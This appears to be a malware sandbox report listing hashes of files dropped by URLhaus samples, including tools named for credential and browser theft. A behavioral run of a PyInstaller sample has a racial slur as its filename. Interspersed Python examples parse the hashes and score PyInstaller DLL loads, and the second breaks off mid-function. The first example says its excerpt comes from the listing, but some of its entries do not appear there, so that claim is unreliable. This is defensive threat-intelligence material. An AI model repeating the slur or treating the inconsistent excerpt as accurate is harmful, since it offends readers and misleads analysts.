SHA256 4d3d060d8ec7089acfb4ba233d6f2a00a910503be648709a97714c84a80cccd8
SHA512 42309b28e5bf15ee9a4708ffcdb18ef2925d4b51151dab75168d3578db538b658c706cd77bfceae9a927516d3fb4b4bd3356e0ee066af5aaeadaa00ecff9a760

C:\Users\Admin\Downloads\UrlHausFiles\a.exe

MD5 ff370f449a6e83018df4b4163380fc57
SHA1 012c030503055803fd192c60dcc9e4733f917025
SHA256 1aa867bb4fb60de654e5e166c0a0e45c3b131a0131484c6b8888fea501c37b3a
SHA512 b0b41d5b391f6cfd582830abe132b87dc9434768c78dca90b3b8aaffe40880f6bb07a120b60cd4832e72202ea7c8257f4ec20d0b152136f6fc1ceb0a2b23ad7e

C:\Users\Admin\Downloads\UrlHausFiles\abc.exe

MD5 37fa8c1482b10ddd35ecf5ebe8cb570e
SHA1 7d1d9a99ecc4e834249f2b0774f1a96605b01e50
SHA256 4d2eaca742a1d43705097414144921ae269413efa6a2d978e0dbf8a626da919c
SHA512 a7b7341c4a6c332aef1ffb59d9b6c5e56ec7d6c1cb0eff106c8e03896de3b3729c724a6c64b5bf85af8272bd6cf20d000b7a5433a2871403dd95cca5d96ebd36

C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe

MD5 031377e4e34dcd19917fac02ff6da79f
SHA1 0fcccffee83cbb77a87ca1b55abc8e18fb267afc
SHA256 d58061a43df6b63e97421904c066ed5ad4b87a3733c250e105e83bc7154d9414
SHA512 f682a314a74dad1269dc1d948dc0c4773eb08e76ab364c3d5a9893577395126e5a409fca18cab24378e95fa71b8d96e20ad22e644275daf3f997edf8592da5c4

C:\Users\Admin\Downloads\UrlHausFiles\three-daisies.exe

MD5 c8a83fc92e8a31bebb4bdef41ab8ec0c
SHA1 985580171c1ddb1fbfb21008ffe056447039e469
SHA256 fbb82dc29a6173818fc34acf9e12ec9425a862cde9db69f7f973f5255c28981d
SHA512 32180ae25d8e7549aba61a7ac124ed587ae0c25be2e962e9698ecf6b9c4a904ae114f6ac4ec88ffb2aa16546de0476049ba92484fd772de2b3ac53c9c37cdbb4

C:\Users\Admin\AppData\Local\Temp\GSE1B0.tmp

MD5 7d46ea623eba5073b7e3a2834fe58cc9
SHA1 29ad585cdf812c92a7f07ab2e124a0d2721fe727
SHA256 4ebf13835a117a2551d80352ca532f6596e6f2729e41b3de7015db558429dea5
SHA512 a1e5724d035debf31b1b1be45e3dc8432428b7893d2bfc8611571abbf3bcd9f08cb36f585671a8a2baa6bcf7f4b4fe39ba60417631897b4e4154561b396947ca

C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe

MD5 54c804c8f597748ce17394624b6c08a4
SHA1 4afa779208e5fa47630a8c4a17107e54db2234f5
SHA256 6163a3302b0eb60ff371116b0e90de30df65493ac7192235d4495e43c4a41d4f
SHA512 17ef71946a361962fc1747d78b60bb481574fba96b079cc3f7b2f220fa36db506cecd3ef9729c84c4e20b9c04b50ec766431d5dce0e21b8f2a15037750003384

C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe

MD5 0066f98970748d1173343ecb8efcb60f
SHA1 b849377f56b23bedd094b3069f645542f095b782
SHA256 fdec686409d94188a755f39cb793f93fd2f0b62e99bc13ea9a63e1f3dd78c8a1
SHA512 fd805eb1e9be1bebe114d3e069fd387e337b620b003425d824debf5426111f97138b2e654e467b41983685c634d485edfc8434ad6217197d1266925f5ede9b1a

C:\Users\Admin\Downloads\UrlHausFiles\mimilove.exe

MD5 c67f3497c310c01018f599b3eebae99e
SHA1 d73e52e55b1ad65015886b3a01b1cc27c87e9952
SHA256 cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef
SHA512 1205b5a9a9d2f3fabcce7e53e70e4efce08b21469ae64120beaee67a828d12eeeecddc623b453105ed15990fcc7bbce53175eca6545007f9d68c0aee66e55bc0

C:\Users\Admin\Downloads\UrlHausFiles\KuwaitSetupHockey.exe

MD5 7f69b1fa6c0a0fe8252b40794adc49c6
SHA1 5d1b7a341b1af20eae2cae8732f902a87a04b12b
SHA256 68662d24f56c624dee35c36010f923a8bf8d14b8c779ad3dafe8dd6b81bb3431
SHA512 6a9e13e0b1c1b0c8fbf41c94147c7cf16a41af7bd656dc606c1ca1dc8bc0986785252155661d19cc2f9ec35b26fb47456d842bc5fdf469bdd09f72d48b3a5256

C:\Users\Admin\Downloads\UrlHausFiles\bp.exe

MD5 6733c804b5acf9b6746712bafaca17da
SHA1 78a90f5550f9fd0f4e74fea4391614901abb94fc
SHA256 ce68786d9fcb2e0932dbd0cba735690dfd3a505158396ed55fd4bb81b028ace0
SHA512 9e1c72d081b3aaed9f8ec97f7a5ed5e8b828b92ee8fd3e1ebb98834b0ba8008110fca97456354a281afcaed351d5a9625ea4a225394f524070ad028c9f221b41

C:\Windows\directx.sys

MD5 a46204336dd420f2e228bc7eb70a83b4
SHA1 195001e17848f59a3bc4bfef2da14376551a9edf
SHA256 cf43ca8a41663426496658c2fc0cf90c3dfd9cc6d46391990d2d05a9afe497be
SHA512 6bb09127012591d4c96fd14bdbb8d9ce3623d347d61ccb7eb943c470196da2e7fd815f06d6467641a60f2987892271eef083b7a76e02172d56baffdf11c32a92

C:\Users\Admin\Downloads\UrlHausFiles\key.exe

MD5 88172b4e193807dfcad3ae22066f5551
SHA1 d77dd1628445d9c0ed3d4249780e7c399c3cf43c
SHA256 e836ad22a227a0429136ea60905a1d790e9bf0ee6add164c4cb932361e6a1756
SHA512 091da6ed210c5886bb9eaa35ac42b23e5f6afe08127866dd9365bcd9e37b1c01fd9c7ad291c79a714a05889cd36b09c80b7a0e3b6ed9410666d5e45ec64db709

C:\Windows\directx.sys

MD5 3fed942b1d8f6f294d17262b8f49e3ed
SHA1 27afda568f687be798ec03ce650a56dafcf46d62
SHA256 39ab8f9f4ca4352a5301e9d2d1e17d467dcf970d977dea5578bc91e0a9c4714b
SHA512 b6e01a9a90ff9f9b74297624c74d02e208c2e15bc79d579c67ffa8096bf3b3d4ae3d3f92b6eabb169b3ffbe30c0646efda1a58203e60ab72210e7b15ca65a716

C:\Windows\directx.sys

MD5 b188607e7e50e8146308f7e29b9131bb
SHA1 70d7e5f44a822d4c3232fc4ff9d8655a7d8120e0
SHA256 c92f9fbd1b5284eb410750f0a1e267c33d505db0d298a4172da28a0e9ceead84
SHA512 d03973421591f217606b85d56ede9425ee1ea64bcca77e3b8fe83022f11abeb1f90ffba8d99a42f691aec7ccc57e45d2a81e8abeba31160559c1b7ed5490fb40

C:\Windows\directx.sys

MD5 013117a815d9156ee0f160ad86d2795b
SHA1 5942da6df5d03f8bd55d48cb4ee208b0c44a0da8
SHA256 0b6eb75225619743b7c6caaa957cc877e3cf8d91829e206679de9fe1f3ef7af6
SHA512 e7e9d76eba5f5bd5429a6776d36331fb76c630172f2e83fa0abdf7915b399bf7bd2011dccde9a85e2b6f9f4bd6cb46f287307d48254d30518cb341475cf87c74

C:\Windows\directx.sys

MD5 d2d340e22ba5156f5d603db97ca09e7a
SHA1 1a491201f8ca0edb3ffe54ca1a3cddc50abf661e
SHA256 e564a371f457a1c420061a8e4f848ae1348d93bf926a32a753233f9f1a2b8eb3
SHA512 33027b3f47f8e005f210f145710f8e62083f08895340e0e6af1b9e9f3e921214502b877ebd29653973c899a5e2ee44c4b858d86f5be29cb0c712519c38d26086

C:\Windows\directx.sys

MD5 032fe683975a999361fe06066771b2d0
SHA1 bfa5cb874bb68bf45513900fff322885d2f6efd7
SHA256 6f4ed9bdc3a368fd0c113dbf51ab80e2b83eadb5ec1f2913b4f1625f9d7fccaf
SHA512 06db896c487d2c7960603319c6c1d0f934ee10d76775cbfb23961576e253513a3d24c6648ba856e84d978d1240da805fb36fae5b2b7a6f89bed786191e48183e

C:\Windows\directx.sys

MD5 eb96d500aa783c60f3a5cfb61bbca211
SHA1 0a31d03b75e4f39097c1bdc010dbb59d818ec36a
SHA256 a774b5d7c7985d1e6e977d24233f0f6dce5c04ae113243389a121117ef66fc28
SHA512 9284ca8ed8369365ec4ee284bd0a475536aecb620e2bfcdfbbf533139e122797818bbc930886292563f0e8b867c60b809fa69f03f1b02775b36809cf15b103fb

C:\Users\Admin\Downloads\UrlHausFiles\new.exe

MD5 4c2a997fa2661fbfe14db1233b16364c
SHA1 e48025dbd61de286e13b25b144bf4da5da62761a
SHA256 c2a299f988158d07a573a21621b00b1577b7c232f91c1442ba30d272e4414c5d
SHA512 529a26f4769c7be0986e16d8e0bf37632b7b723a3e8d9fa8bb3f9cc4d766bd4d24a802d6aa43fe4df85c23cd680b0188c7e1eaff443a30203b298ba916aa0a57

C:\Windows\directx.sys

MD5 0877a594f8c8ce92ac2af1b88d35da32
SHA1 6b7b907a2b68db647046b13e4290f5f69c0d1d96
SHA256 05a78a773374fdad30a8f7eae0e082d61b86c5cadd1ab91ba8e1b315bab08a04
SHA512 7778c68916253215a37f5cefcdb8c4bdbb11ba72fd633fa0d5c3b2533941d8bda87a4311a2a1c59361aa54e70516d5bc27309c74f0e5be685ed0f98108a64b8c

C:\Users\Admin\AppData\Local\Temp\F392.tmp.x.exe

MD5 97eb7baa28471ec31e5373fcd7b8c880
SHA1 397efcd2fae0589e9e29fc2153ffb18a86a9b709
SHA256 9053b6bbaf941a840a7af09753889873e51f9b15507990979537b6c982d618cb
SHA512 323389357a9ffc5e96f5d6ef78ceb2ec5c62e4dcc1e868524b4188aff2497810ad16de84e498a3e49640ad0d58eadf2ba9c6ec24e512aa64d319331f003d7ced

C:\Windows\directx.sys

MD5 ce22c312e0691c53668d72e196fb1156
SHA1 fdcd7ab1dd20064f05b109cb07f0b1c2bb88d2f9
SHA256 fae76dceecde72ec87e3e8ebc03eafe92c17e6d8ff04d9a3b21d98b60659bd67
SHA512 e8d62b220c4cd1adc2aa79a9e6000615f41304ea8caa37c36ef714c5720ac78127f61edb00dadaddf633380c3da129d37d80d3cf56e9bb960ef568dde8955322

C:\Windows\directx.sys

MD5 30e530c6133d9a3cff77cd38967dddae
SHA1 5010fa7e0ed21c99699013b14e7bfba55b58bf72
SHA256 984761661c727199f1a8b1a8cdf063629a1e24e721492720ff1ee748948b5795
SHA512 5f219bd4e85d8fa1a6c62a87d5f34f951e0133364fc098fbea698eab476ce46989ee2b3022a4b1bdf04e2679c50019d960f3a3df9acf4b8af85bf4c3e8767fdc

C:\Users\Admin\Downloads\UrlHausFiles\chisel.exe

MD5 ca7d144217321a024dcc6fdd636306c8
SHA1 9ea9214be276f28e21d409c1aa30388b3994a660
SHA256 03b424d1ce73c9c4130b522a344ab2b0d2a8706fdbd5acb92edd4f47d46dde0d
SHA512 05b845f640a4ca3f4c4dbc21ff674f9be8513745793df49baab4f2d1df2f737d0b40ba4567b6b3df446b84ce4589bb2110f708a104b21afc3900c889c985719d

C:\Windows\directx.sys

MD5 53776f419b0d8123e3b7b16239ddc30b
SHA1 454523fbd526fb78cd813051bc3ca42c63bd8133
SHA256 666e7c708c0430a398248f6540da9a84976bff4eec256f5c65687932ea7ceb97
SHA512 47daeee7b21636126c2d44c9bd472b6eed6631648e37d339cbd89ed73e581ad570bb4adc0669fff5d3bc68d3fe741ff9dab4ad1480d3d03693c10d1fef3a73e5

C:\Users\Admin\Downloads\UrlHausFiles\jeditor.exe

MD5 581a9eb520eff140ee0f3d266abe6291
SHA1 fb3ecc2ecd801fc34e67c4f9e8f99db4760465bc
SHA256 5b138b76f61c815de8fdfaf80a99afe1e8a9c19ba29e25736e691664242dce4a
SHA512 10e5bc90c764005f704adf3e80b6c08c7ec4e0517ac185b87d647b5a04b9855e3ede3bd9085883fbaf76d230ef236c3788d8da5e1abc038008e3bf094b90f7e7

C:\Users\Admin\Downloads\UrlHausFiles\Beefy.exe

MD5 8d644c8cb9c08d33b5efc8e05a8f11dd
SHA1 a49b9fd9d7f04bdac19a86b622e4e569bb1650e1
SHA256 af345887a4ce62f171ce80e9b33e15162084005c0822043cfb98d184f59564c2
SHA512 6a76a8a0d51d39d4a9d0c3fc8d3e4d9fc02447d581aa4e3764d1954aa24af2cbf1aa226501a2ceb77fb2bf17f7e782a71762bf80f4fda706e58b8eb5a928da61

C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe

MD5 e468cade55308ee32359e2d1a88506ef
SHA1 278eb15a04c93a90f3f5ef7f88641f0f41fac5bc
SHA256 f618e9fa05c392501fb76415d64007225fe20baddc9f1a2dcc9ff3599473a8eb
SHA512 82fef308bc65616efb77b3f97ff7fcd14623a3955d18a9afff5c086d85d0f2e6856468ad992da2fb01aae6488afb0c0cdb80744cc20d74d3af851f35d30947d6

C:\Windows\directx.sys

MD5 97b656641ae387aafc3e52acb4dcbc94
SHA1 1b7296a3347daf8bb87bc71094f33a79bc279d2b
SHA256 5cde90ffa1563e07b6c90493300ee62c4dcc5654f5f2857723bc2c30e6d7f73f
SHA512 45da976165214d112fda5db60fcbf77960cf2687d99936a79ce45c583e4e9bb5140470a90e4256dabc0c7501fd2e9b95072ffbd0f57b6581917764ed2f8869f5

C:\Users\Admin\Downloads\UrlHausFiles\test26.exe

MD5 b9054fcd207162b0728b5dfae1485bb7
SHA1 a687dc87c8fb69c7a6632c990145ae8d598113ce
SHA256 db032c18992b20def16589678eb07e0d3f74e971f4efc07196d7cd70a16753bc
SHA512 76e33c6b965ffb47f0a2838ca0571134cdf32ab9f6808bc21e6ca060b4d23e15cd686bd6d57571dbc613aa6e17a3702264079f2bc411de1a72a7d1e01afc469f

C:\Windows\directx.sys

MD5 23725739b75dca73fac0b072fbbc80a6
SHA1 1a8300942b91ccb6e7eae0662d79ce230ce3d05d
SHA256 3eaab030d5175e257dcc2d963018c0a08b51d8c10633acdf9a2aa594615aa893
SHA512 e51b9ee66ee373802e40d98d0a980383f5ffe404be1948d262e06aff5de249db6602fa35a0b7c3d01ed285e97e00a1777a692feb1b077d344ebc01dcd52f67f4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe

MD5 ea257066a195cc1bc1ea398e239006b2
SHA1 fce1cd214c17cf3a56233299bf8808a46b639ae1
SHA256 81e95eaca372c94265746b08aac50120c45e6baae7c521a8a23dd0dfdc3b9410
SHA512 57c01e41e30259632ffbe35a7c07cc8b81524ca26320605750a418e0e75f229d2704ae226106147d727fe6330bc5268f7a2a9838fa2e7b0178eadf056682a12f

C:\Windows\directx.sys

MD5 d827ab5ce62fa1a13599e44c2b5eb68c
SHA1 eb1b2eef98d326bb819789bdb6bb61d150b0838d
SHA256 3b35dacf3f18db408eedb34a19de355aba0057b9e541bd47e1cc8922468d861d
SHA512 c70fa32ca445d4ef38d8b31f2f028dfaf7c423e1101917c0646ec0515bc5fe250e25218165b658588984b5fae7cb873d880739cddd69c2b76a6583d05b1c4dca

C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe

MD5 45fe36d03ea2a066f6dd061c0f11f829
SHA1 6e45a340c41c62cd51c5e6f3b024a73c7ac85f88
SHA256 832640671878e0d9a061d97288ffaae303ba3b4858ed5d675c2170e7770ec8a6
SHA512 c8676bd022fae62a2c03932dd874da8482168698fc99987c8d724b5302f75131839b5b3b6f8288b823c5bb732918f6bc49c377116bb78825807de45b6a10026f

C:\Windows\directx.sys

MD5 1b96c1917e08eecf75efb96ff8b32aa6
SHA1 f0b531b22bd2062fce3c929c6a56c59bcb3fd0a8
SHA256 4ea936a86f4bfb1564d3b0c4c138c00cf9871dd1605278c3a5a2cc20d2cdbe3b
SHA512 be6cf664bf7254a760d1eae8fab20a61a1342122a1ab861b20a68c3a1814e861e35b9d3ac76bd0ae6a6b19721df4987eee2b636a084f5f9a38f46cd872b2ed12

C:\Windows\directx.sys

MD5 11a2c8e8eee73c8292af4c68c87d3f95
SHA1 bfe972e24fc5084e4118a1ab77288c06139e3d76
SHA256 4f9265944e086641d540c2e7ef4c263ec58373801f607d8c995d1e1a4393ddb6
SHA512 69d5e639c61c383eccd21880ae191099fc993bcd5faee05595ad0553ef995d8b813ba296c4fe4e14f55501fcf4a9868c8c7a33ef0529fdcb7fe75a99dec7512c

C:\Windows\directx.sys

MD5 afc2d2378b42846f16157d8eca5e7792
SHA1 2b46cb980c2a731f7190e2d6354fc9b26b396ed5
SHA256 d72d95dac3332bcb7a184faed3bec309027001c85c38e6d9199447c0fbbd6887
SHA512 1810507b400025fb2232a714c16ef60fdab97c25937f38523ac16f1a7db6a32e4e44a8a94d758f1e025a156970d3503183b98b93cba3c27817411ffd0fda0998

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

MD5 f7f61ffb8e1f1e272bdf4d326086e760
SHA1 452117f31370a5585d8615fc42bc31fdbe32a348
SHA256 e98ae7f96f7cee07ef93b3c98ccae81c66b29e4ede046112e200bf7c152fa9af
SHA512 158fe3a916f761d766acb75da048b6e224a18d8aadde24af238e6c94be117ff2639463cb4b78c8642a3980d1b9e130741023a848853bca135e8f1fcba481305f

C:\Windows\directx.sys

MD5 71c53284102c537be6cfce6ae7651ee7
SHA1 7fafbff525c79fe71b5d973fc02ef632b73e1d6c
SHA256 945128d038b443ef9ffb54e345303960c006839b522de30e9672c616b6ad02cc
SHA512 4011a598e57ba7855be70bc714055a66f2995ce853e31833dca3c3256d8cf84b88cd8719dfba2ecbef8902401264c39f531a2b09e1d482ee5fb390361352e614

C:\Windows\directx.sys

MD5 1e96152ca7879c668814acc782c6b7d3
SHA1 40b27bfe1916a118377de4c75eff3e1b17235227
SHA256 b8e242ebf7e5a859f51a36891e8b5205f0b8e24b3a81fcdd347fb9e990022583
SHA512 fac30b63ed52083c17a3c0cb72c068bb4f11c9495c394b65055eb2bdac2709afc863459bab7aafbb0a9f4c603b4b67da81d03bdd4a487bfdc2490d1c19c9df10

C:\Windows\directx.sys

MD5 fde174c194bf224ecfe20795a81699d0
SHA1 806b0aa1c12ef8df269ca9b9a7e68764e2c93c5a
SHA256 f0429b79c4a9fe6345cfef9f1219cd01d306a59204a0cfaa91d168dbe91b804c
SHA512 fcd33cca95b14d0e7380b91fa70b087a9538f8cbc2dd1079bee98bb0b01658dd19637a1cb1055963ca91f0fd5efe2e0fddbdda2124a20af8e75ceeb5559ff962

C:\Users\Admin\Downloads\UrlHausFiles\ipscan.exe

MD5 6c1bcf0b1297689c8c4c12cc70996a75
SHA1 9d99a2446aa54f00af0b049f54afa52617a6a473
SHA256 40dc213fe4551740e12cac575a9880753a9dacd510533f31bd7f635e743a7605
SHA512 7edf53adf8db463658aa4a966cf9e22bf28583cb0ca4317af19e90d85232b6cb627e810033155383948d36ad6a1a14f32b3381d10c7cd6c4bd0482c974c129db

C:\Windows\directx.sys

MD5 c73628947e54e0f324e1139e11a3a5d9
SHA1 30bf3de09ceecb2f4ee2bd16079ca10b0d58248b
SHA256 4e03e371e1cbb5cac32c440af90b54d5d82f0998e8d33fb64959e8fb3252f27c
SHA512 8d6985d5e28a2abe8c64a53fdd66b7517dedcdc077aee48fc5fb1991ffe04a205754a9df7956351e933446c124d5c647f834d75185c221d11528e625f94d848f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a2f3c859-93c3-4baa-9f22-bd5f5b6244b7.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a492189da88fa2e46fff2f204c7b60ac
SHA1 f4c43854809d78e9e36400de22702e2e06cdef29
SHA256 e171ebf6b6df011253ccff0fb9edd57cccf408388426fe5aac4967f8cfd0d330
SHA512 278cadda6403e483c177827a4229fed6354d03a68ebd3dbc494704f1b993440594f5ba32c39c571fe62b338885ada24c305eabd09c5cf0d4918c105cfa080ed7

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Windows\directx.sys

MD5 c052df275d34357e8a69f1ef2990d16d
SHA1 a4cb4b778dc7d829a8a49f9e574fe18864bc6a3d
SHA256 7026130a1809b971c95d899ef48a50998f27b4045a18897de16efc5b1c701ca9
SHA512 659e779d984168d1c1bc5b9cdaf6ec04fc664767126a943100a84a3594ae9ff5164206c3c8fff84fb3d8c87387036c1f705dd6a740174ecfdbf254de53daa01c
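The dropped-file listing above follows a fixed shape: one path line, a blank line, then MD5/SHA1/SHA256/SHA512 lines, with memory dumps (the `memory/...-memory.dmp` entries) carrying no digests. Two things a responder wants from it are a deduplicated hash set for blocking or hunting, and the set of paths that were written more than once with different content (C:\Windows\directx.sys appears many times above with a different hash each time). The following parser is an added example written for this page, not code from the sandbox vendor; the embedded listing is a short excerpt copied from the entries above, and the digest-length check is a sanity check on extraction, not a verification of the hashes themselves.

```python
"""Parse a sandbox dropped-file listing (path, blank, MD5/SHA1/SHA256/SHA512)
into records, sanity-check digest lengths, and flag paths rewritten with
different content. Added example for this report; not vendor code."""
import re
from collections import defaultdict

# Hex-digest lengths for the four algorithms the report lists.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")

# Excerpt copied from the dropped-file listing above (a small subset chosen
# for the example, not the whole report). Memory dumps have no digests.
SAMPLE_LISTING = r"""
C:\ProgramData\DMailOrganizer\DMailOrganizer.exe

MD5 ee44b46a4bf06ff63ea1f8ffb342eb34
SHA1 6249b9e52d4d8af4cf27d26fef3e42f7fd7fa582
SHA256 c74083e5e881dcb00dbaf3fd94afc3c4f2a69a6312f67e55bbdb7e32a654a656
SHA512 533a2052e4b888359adefea56fb18bcfe1fa715c72231d9e5c8cdec80998d67b710202868cbd03cb6e3c00d99eb1f927e8750851a06991daaeb696ec2862595a

memory/7228-4480-0x0000000007270000-0x0000000007313000-memory.dmp

C:\Windows\directx.sys

MD5 a46204336dd420f2e228bc7eb70a83b4
SHA1 195001e17848f59a3bc4bfef2da14376551a9edf
SHA256 cf43ca8a41663426496658c2fc0cf90c3dfd9cc6d46391990d2d05a9afe497be
SHA512 6bb09127012591d4c96fd14bdbb8d9ce3623d347d61ccb7eb943c470196da2e7fd815f06d6467641a60f2987892271eef083b7a76e02172d56baffdf11c32a92

C:\Windows\directx.sys

MD5 3fed942b1d8f6f294d17262b8f49e3ed
SHA1 27afda568f687be798ec03ce650a56dafcf46d62
SHA256 39ab8f9f4ca4352a5301e9d2d1e17d467dcf970d977dea5578bc91e0a9c4714b
SHA512 b6e01a9a90ff9f9b74297624c74d02e208c2e15bc79d579c67ffa8096bf3b3d4ae3d3f92b6eabb169b3ffbe30c0646efda1a58203e60ab72210e7b15ca65a716
"""


def parse_listing(text):
    """Return one dict per entry: {'path': str, 'hashes': {algo: hexdigest}}.
    Any non-blank line that is not a digest line starts a new entry."""
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            current["hashes"][m.group(1)] = m.group(2).lower()
        else:
            current = {"path": line, "hashes": {}}
            records.append(current)
    return records


def validate(record):
    """Return a list of problems with an entry's digests (empty list = clean).
    Catches truncated or missing digests left behind by copy/paste."""
    problems = []
    if record["path"].startswith("memory/"):
        return problems  # memory dumps are listed without digests
    for algo, length in DIGEST_LEN.items():
        value = record["hashes"].get(algo)
        if value is None:
            problems.append(f"missing {algo}")
        elif len(value) != length:
            problems.append(f"{algo} has {len(value)} hex chars, expected {length}")
    return problems


def rewritten_paths(records):
    """Map path -> sorted distinct SHA256s for every path that was dropped
    more than once with different content."""
    seen = defaultdict(set)
    for r in records:
        sha = r["hashes"].get("SHA256")
        if sha:
            seen[r["path"]].add(sha)
    return {p: sorted(s) for p, s in seen.items() if len(s) > 1}


def unique_sha256(records):
    """Deduplicated, sorted SHA256 list suitable for a blocklist or hunt query."""
    return sorted({r["hashes"]["SHA256"] for r in records if "SHA256" in r["hashes"]})


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    for r in recs:
        print(r["path"], validate(r) or "ok")
    for path, shas in rewritten_paths(recs).items():
        print(f"{path}: {len(shas)} distinct versions written")
    print(len(unique_sha256(recs)), "unique SHA256 values")
```

Run it over the whole Files section (copied into a text file) rather than the excerpt to get the full hash set; the rewritten-path output is the quickest way to see which on-disk locations the sample keeps overwriting, which is also where a file-integrity or EDR rule should be pointed.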

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-04 13:02

Reported

2024-12-04 13:05

Platform

win7-20240903-en

Max time kernel

122s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Signatures

Loads dropped DLL

Description: N/A
Indicator: N/A
Process: C:\Users\Admin\AppData\Local\Temp\niggers.exe
Target: N/A

Processes

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI17522\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b
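This run shows the usual PyInstaller one-file footprint: the sample executes from the user's Temp directory, spawns a second copy of itself with the same command line, and the child loads python311.dll from the `_MEI17522` extraction directory under the same Temp path. The detection below is an added example for this page, not vendor code; it scores image-load events on those three traits rather than alerting on any `_MEI` load, because legitimate PyInstaller-packaged software produces the same directory name. The events are constructed for the example: the paths come from this report, the pids and the explorer.exe parent are invented.

```python
"""Score DLL loads from PyInstaller _MEI<digits> directories, weighting loads
by processes running from user Temp and by the bootloader's self-spawned
child. Added example for this report; events are constructed."""
import re
from dataclasses import dataclass

MEI_DIR = re.compile(r"\\_MEI\d+\\", re.IGNORECASE)
USER_TEMP = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)


@dataclass
class ImageLoad:
    pid: int
    image: str    # executable of the loading process
    loaded: str   # DLL being mapped


# Constructed events modelled on the behavioral1 run above. Paths are the
# report's; pids and the explorer.exe parent are invented for the example.
EVENTS = [
    ImageLoad(1752, r"C:\Users\Admin\AppData\Local\Temp\niggers.exe",
              r"C:\Windows\System32\kernel32.dll"),
    ImageLoad(1780, r"C:\Users\Admin\AppData\Local\Temp\niggers.exe",
              r"C:\Users\Admin\AppData\Local\Temp\_MEI17522\python311.dll"),
    # A PyInstaller-packaged application installed under Program Files:
    # same _MEI pattern, but neither of the other two traits.
    ImageLoad(2200, r"C:\Program Files\Foo\foo.exe",
              r"C:\Program Files\Foo\_MEI4444\python311.dll"),
]

# pid -> parent process image (constructed; explorer.exe is assumed as launcher)
PARENT_IMAGE = {
    1752: r"C:\Windows\explorer.exe",
    1780: r"C:\Users\Admin\AppData\Local\Temp\niggers.exe",
    2200: r"C:\Windows\explorer.exe",
}


def classify(ev, parent_image):
    """Return a hit dict for a _MEI DLL load, or None. Score 1..3:
    +1 DLL comes from a _MEI<digits> directory,
    +1 the loading process runs from the user's Temp directory,
    +1 the parent is the same executable (one-file bootloader child)."""
    if not MEI_DIR.search(ev.loaded):
        return None
    reasons = ["DLL loaded from a PyInstaller _MEI extraction directory"]
    score = 1
    if USER_TEMP.match(ev.image):
        score += 1
        reasons.append("loading process runs from user Temp")
    if parent_image and parent_image.lower() == ev.image.lower():
        score += 1
        reasons.append("parent is the same executable (self-spawned bootloader child)")
    return {"pid": ev.pid, "image": ev.image, "dll": ev.loaded,
            "score": score, "reasons": reasons}


def find_pyinstaller_loads(events, parents):
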